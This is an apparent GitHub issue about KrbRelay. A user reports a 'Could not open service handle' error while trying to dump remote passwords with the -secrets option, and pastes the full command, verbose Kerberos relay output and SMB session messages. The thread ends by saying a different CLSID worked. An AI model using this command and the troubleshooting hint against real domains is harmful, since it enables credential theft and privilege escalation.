Could not open service handle, wrong name?
job-6 opened this issue · comments
I am trying to dump passwords on a remote machine with option -secret but receiving a "Could not open service handle, wrong name?" on Windows Server 2016 1607 (source and destination). Any idea? ;-)
The SMB session obtained is unprivileged and seems to come from the user that is running the command instead of the targeted one in session 4.
.\KrbRelay.exe -spn cifs/srv01.lab.local -session 4 -clsid 0289a7c5-91bf-4547-81ae-fec91a89dec5 -secrets
[*] Relaying context: lab\da01
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAB5xV/ci7Pv5WVPMzxQBfngAkwAAJAD//+n36aR6q52FyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing cross-session authentication
[*] Using CLSID: 0289a7c5-91bf-4547-81ae-fec91a89dec5
[*] Spawning in session 4
[*] apReq: 608206ed06092a864886f71201020201006e8206dc308206d8a003020105a10302010ea20703050020000000a38204f6618204f2308204eea003020105a1121b104f46464943452e5741442e4c4f43414ca22d302ba003020102a12430221b04636966731b1a7761642d77656230312e6f66666963652e7761642e6c6f63616ca38204a23082049ea003020112a103020101a28204900482048c0a156e4d228e655ef499c6d55151dfbcb62816ea97744b1381549ee19074f950d206ef237538ef274bbc219b4f9b08600b02849f571c9e18c66f191725ab054ebdf4f5cf71c59d2494bd1e7c1b57aacc8522e3467cab9ceedc85647997e08af14a304525e7ea1bd0c17e3290f65815fd022dd58f7a4fdd239b6d88155e0cfa84d43cf803587c6724cd2f697141374ee82f6b3daa62d7c0b7938cc9dea8f941a858b1b208f64887e2cdeeed89dfda8307eca315487b03aa940567b9bd446767fb36c9a7a30e04f4883d766a009572b9b16e724a91b248e3669af1c9e952ee2f7d4ac19d16ba78b9935a8d3f91c8ffc56d5155f2f377ad0b7a14563aa2aaf8cf0f1d6a7f8a95f7dec628378be734c9170f0e1b6ae8d5f8bc625e00070299b9de3e1df5a404d35db9e5bde83f1c1da0bba2de41347cd60c8f4f3413f13009a1f3a60f41d1b656949bff3af45e545ae35c4df92771970b943d33052b9ca9306b94559f893ccaa8619b64a184d630cda124970239e897429af7b83711812d80dd18221aa0a54b377ca1fe36c5fd0df4b5231fd726dfc20714c49bb7f9ceb56e97a7b455e3adb3890ae498c045cc2389f9b121e7d7370b164e5d623dc0e4b29b3c59558a05eb8240a1b94cbdbdeae0862bcea9c310e8df8334cb14a965bc6f29824596ac236c8273e8f5f1f183622b5da16e9be2588f3f78c905da2976b50f0fb8b8ffae1e93d271e0184144214d86e8d12fc948d8c7327c820e41b41439becb784d1cdcb74c3e1a18c1521908728b28ba82703286da6dc551ed748b10cb1e30ee2b149277f189b395f85bae27b98446995ca7b31615ed2059dab54270a246fac72f1558fc86fa8ed7f1afbc75751949fefdcf83b137fb0449b40e375fd154e8756abfa26e7b4bbb435d0d1d141cb1628ae50911f2eb0c095888ffb57f927e289e036fff68a93420bc23fd137c514fa04624a9f256019baca362b99055e7908d4e00f05e7a73ef11b5c3da1b1102f3b32b851087a8c862e9a5d2685014a38d2d0649818254c66cd82c93a78cf3d85bb17324142b753daa2d4b94864c880ea78f01152148f07f826bb8b307c4d06006d44c43aefdf3a7c903eadf56fd44515ef264e2bd74d14c4d9c737a96b28ee889d244aebcb5f99193a7475f6d7430679e3ec979ff86e9c3eac457a186b2d22c778da207d0f86ed69abeb3c01152cb07b96dbfb3a205f0763fa5ad2f952bfa1b31f2e974984e91a97e0fcda5f8046512d7d9c790d0101f3d44ecef0764b0d2d04566843a2f664adf3a5452749be160baf66f49f4b789e180c225a2bc6d011a8793383c7c14dad25bd9c553c2cd93f965af4ca581a213e8dd62a5be18aba1ebf278a0c1e08baa10bffe6cbc3859f84dea2760a7260eb1d8e2c769293e6c821fa5f3ef91761df07dd6858559330cc2fbdf8a4ebdca3fb00e58cf3df7f1f93d3dbfca69d2d4eece65941068937f2dd821ad31e4b2f9e3097425d38d03fda2f1f1a5e97b17ba29bb3a22e496891b7296ca0a45adca347806d21a9a3021324200a25a4c5d63630f2e31ccae99c69103fbd5ddad61ea126465e204dda4d9595bfd5602d0f34beb1d1689ad2e6eef1e6034ca76d16d7e57cfd8b63e3d1b2c1ec7f1330b8fa48201c7308201c3a003020112a28201ba048201b63ad45fb236eabfb80492aebc0a75c84516893e58c921641651f7b988f8ec36ae2caac2e3e0798459a1379bd491b83b371a4b73a87338fbaf773dcd05aca88ad7307ef08753793909794a50705bf96e2c086f785aaeca4df0e1941cbb63c41fc43172a735c40412e4c3ad3727d5b815c72370e800f928c4e69f32edd92e9e19be29a246524c2f92dd80a39467af073644cb5ad61b1913f5548d23740a56e6d62d1f4925257f660b204dd6edb1013726db4a474465dba4f280277862ffbd7e3cd2f8eb3d7830ae88d55d5cec5c514354cdb13875f61d2c634148462fb9125e2f42aca79f81e3160caa46ac285aeff53b245fd83e639f40f350ad8752789fd7b9160b041c65ead6b866a58287c68b883ce4d5cc3fb7d58049733c690e9c293a2a3d07fff5dd0e5ed61dd1853a51efd5298cf55686e70c38d4d233b82c3de7c9d828026206a477dda85d382ff1e9c4f740899da0c90e13263b891df9f47d5bc3593ae1baa74e6065cce772198c71cd3777ca7aedeb69c0933c0fd13af01065251737611d384ba26136e41921a37be4d15521bb8a97ad30ad25580f4dac51a5c8cdb33b90dbbdbc72505f88ee5b9a1c7d3fefdb2f625b2bde
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046e968a45b9c6b880b9f734e7301d1d12279765fa3379fe3fd9e5501209e88f9da347ec78a24421eda252cc0ed73f7eccbb27fd7eceb8c2b7767b0227695644a785d00e96bf3def2644944f5582fe14f54f432cfaca5da67d6812c4cc8d8caf08b8c2160e874ddb79b511c3bdef9030
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5a3058a003020105a10302010fa24c304aa003020112a2430441d51192b4623888be0e012bfcacf1345d6a6cab5979683329622f13114500bd793a4239813e9753835b45b1e505832416282cfa8a7eb89e96d21a2f93fef7a9f03f
[+] SMB session established
[-] Could not open service handle, wrong name?
[-] Could not start remoteregistry
Okay it seems that the chosen clsid was the problem. I used another one and it worked.